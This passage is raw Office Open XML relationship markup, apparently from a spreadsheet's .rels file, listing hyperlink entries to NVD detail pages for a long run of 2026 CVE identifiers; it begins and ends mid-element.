Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67846" TargetMode="External" Id="rId2107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67961" TargetMode="External" Id="rId2108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68508" TargetMode="External" Id="rId2109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId2110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId2111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId2112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId2113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId2114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId2115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId2116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId2117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId2118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId2119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId2120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId2121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId2122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId2123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId2124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId2125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId2126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId2127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId2128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId2129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId2130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId2131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId2132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId2133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId2134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId2135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId2136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId2137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId2138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId2139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId2140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId2141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId2142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId2143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId2144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId2145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId2146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId2147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69407" TargetMode="External" Id="rId2148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId2149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId2150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId2151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId2152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69432" TargetMode="External" Id="rId2153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId2154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId2155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId2156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId2157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId2158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId2159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId2160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId2161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId2162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId2163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId2164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId2165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId2166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId2167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId2168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId2169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId2170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId2171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId2172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId2173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId2174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId2175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId2176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69541" TargetMode="External" Id="rId2177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId2178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId2179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId2180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId2181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69576" TargetMode="External" Id="rId2182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId2183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId2184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId2185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId2186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId2187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId2188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId2189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId2190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId2191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId2192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId2193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId2194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId2195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId2196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId2197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId2198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId2199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId2200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId2201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69731" TargetMode="External" Id="rId2202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId2203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId2204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId2205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId2206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId2207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId2208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId2209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId2210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId2211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId2212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId2213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId2214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId2215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId2216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId2217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId2218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId2219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId2220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId2221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId2222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70574" TargetMode="External" Id="rId2223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId2224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId2225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId2226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId2227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId2228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId2229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId2230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71382" TargetMode="External" Id="rId2231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71613" TargetMode="External" Id="rId2232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId2233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId2234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId2235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId2236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId2237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId2238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId2239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId2240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId2241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId2242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId2243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId2244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId2245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId2246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId2247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId2248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId2249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId2250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId2251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId2252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId2253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId2254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73014" TargetMode="External" Id="rId2255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId2256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId2257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId2258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId2259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId2260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73231" TargetMode="External" Id="rId2261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73234" TargetMode="External" Id="rId2262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73505" TargetMode="External" Id="rId2263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7476" TargetMode="External" Id="rId2264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7477" TargetMode="External" Id="rId2265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75631" TargetMode="External" Id="rId2266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId2267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId2268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId2269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75992" TargetMode="External" Id="rId2270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76957" TargetMode="External" Id="rId2271" /><Relationship 